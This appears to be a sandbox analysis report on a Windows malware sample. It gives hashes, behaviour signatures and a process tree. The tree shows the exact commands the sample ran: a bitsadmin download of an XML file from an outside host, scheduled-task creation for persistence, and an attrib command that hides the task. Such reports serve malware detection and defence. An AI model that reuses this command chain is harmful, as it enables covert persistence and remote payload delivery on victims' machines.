Overview

overview

8

Static

static

f6cfc83f98...09.exe

windows7-x64

8

f6cfc83f98...09.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    95s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220721-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-07-2022 05:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe

  • Size

    102KB

  • MD5

    741d79de62c0d6a30f1e84b1eb6604ee

  • SHA1

    3383f9a71e614a65a151d0392a87e3dd379bf579

  • SHA256

    f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109

  • SHA512

    8156eb0a3e8856efadce37f982408189f69126298dd5564b05d1ca6872add84490e4581e696f320a9ed1dadbd37f56429604d5efa401320829b1ed730943297c

Score
8/10
evasion

Malware Config

Signatures

  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe
    "C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2244
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\46V1IFAS.cmd" "C:\Users\Admin\AppData\Local\Temp\f6cfc83f98db1f4d5750dc8be7ed539db2ed84dba811e88f4e1b20017c6ac109.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4284
      • C:\Windows\SysWOW64\ipconfig.exe
        ipconfig /all
        3⤵
        • Gathers network information
        PID:1204
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c type infile.txt
        3⤵
          PID:1712
        • C:\Windows\SysWOW64\PING.EXE
          ping -a 8.8.8.8 -n 1 -4
          3⤵
          • Runs ping.exe
          PID:4736
        • C:\Windows\SysWOW64\bitsadmin.exe
          bitsadmin.exe /transfer "SyncScriptXML" /download /priority FOREGROUND http://onlineservices.fawmatt.com.au/AppStore/ALL-Domainless/syncscript.xml C:\Windows\Temp\syncscript.xml
          3⤵
          • Download via BitsAdmin
          PID:4156
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /Delete /TN "SyncScript" /F
          3⤵
            PID:3884
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Create /TN "SyncScript" /XML C:\Windows\Temp\SyncScript.xml
            3⤵
            • Creates scheduled task(s)
            PID:1752
          • C:\Windows\SysWOW64\attrib.exe
            attrib C:\Windows\System32\Tasks\SyncScript +s +h
            3⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:1172

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\46V1IFAS.cmd
        Filesize

        4KB

        MD5

        4901c736143f06b956c7d4268609ba67

        SHA1

        5e2c086ac18b82d5a5d5474a5bd26e31d733eb17

        SHA256

        555f20bb938c7e90e1cbf0eb173aae217d06aae2fbb96b2bfefc4684439f0851

        SHA512

        c43f67f9b528d9e76527063d78af3e38fb108a7352aa5b4658a6a25e0f77b208494b17b269681df95c3754d16ed5ca8e644f10b958d86acd520d88d742ccf997

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\infile.txt
        Filesize

        1023B

        MD5

        2fdb8b59b20f2a5270228994d0714e17

        SHA1

        cd5e51db145be79a55c44aa076e60e4fd2ab45ec

        SHA256

        e77bbd6510cc619f55c4119cb470fe669193c93c30b0ae5f78f602de2b6e2769

        SHA512

        4d69a16ae45e1876bb650a969f6cf092b21873d38e171c549055b48a678cd2641fd26b55c9fd088886fe659673b1224e672614ec7d4c469b61d901e7907255dd

        Download Submit

      • memory/1172-139-0x0000000000000000-mapping.dmp

        Download

      • memory/1204-132-0x0000000000000000-mapping.dmp

        Download

      • memory/1712-133-0x0000000000000000-mapping.dmp

        Download

      • memory/1752-138-0x0000000000000000-mapping.dmp

        Download

      • memory/3884-137-0x0000000000000000-mapping.dmp

        Download

      • memory/4156-136-0x0000000000000000-mapping.dmp

        Download

      • memory/4284-130-0x0000000000000000-mapping.dmp

        Download

      • memory/4736-135-0x0000000000000000-mapping.dmp

        Download